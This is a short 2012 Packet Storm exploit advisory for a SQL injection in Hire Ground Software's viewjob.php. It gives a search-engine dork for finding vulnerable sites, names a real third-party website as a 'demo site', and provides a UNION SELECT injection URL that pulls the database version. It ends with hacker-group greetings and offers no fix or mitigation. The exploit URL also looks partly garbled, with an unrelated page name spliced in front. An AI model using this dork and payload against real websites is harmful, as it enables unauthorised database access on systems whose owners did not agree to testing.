Hire Ground SQL Injection

2012-02-08T00:00:00
ID PACKETSTORM:109541
Type packetstorm
Reporter Th4 MasK
Modified 2012-02-08T00:00:00

Description

                                        
                                            `  
########################################################  
  
~ Exploit Title: * Viewjob PHP SQL Injection *~   
  
~ Author: Th4 MasK   
  
~ Contact to ; th4_mask@windowslive.com ~  
  
~ Date : 08.02.2012 ~   
  
~ Vendor : http://hiregroundsoftware.com/  
  
~ Platform : Php ~  
  
  
########################################################  
  
~ Dork: viewjob.php?id=  
  
  
########################################################  
  
~ Demo Site :  
  
~ http://www.deanslist.co.uk/viewjob.php?id=212  
  
Exploit :   
  
http://localhost/listarivisteuk.php?Id?=(id)viewjob.php?id=212/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14--  
  
########################################################  
  
~* Bilinmezlik DiyarinDan  
  
########################################################  
  
~* Olmassa Olmazimdir. Bazi seyler.  
  
########################################################  
  
~* Email:th4_mask@windowslive.com~   
  
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net   
  
  
########################################################  
  
TWS Family  
  
~ Mugair,Nikolay,Darkness Devil,Tekfurdaðlý  
  
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/  
  
########################################################   
  
`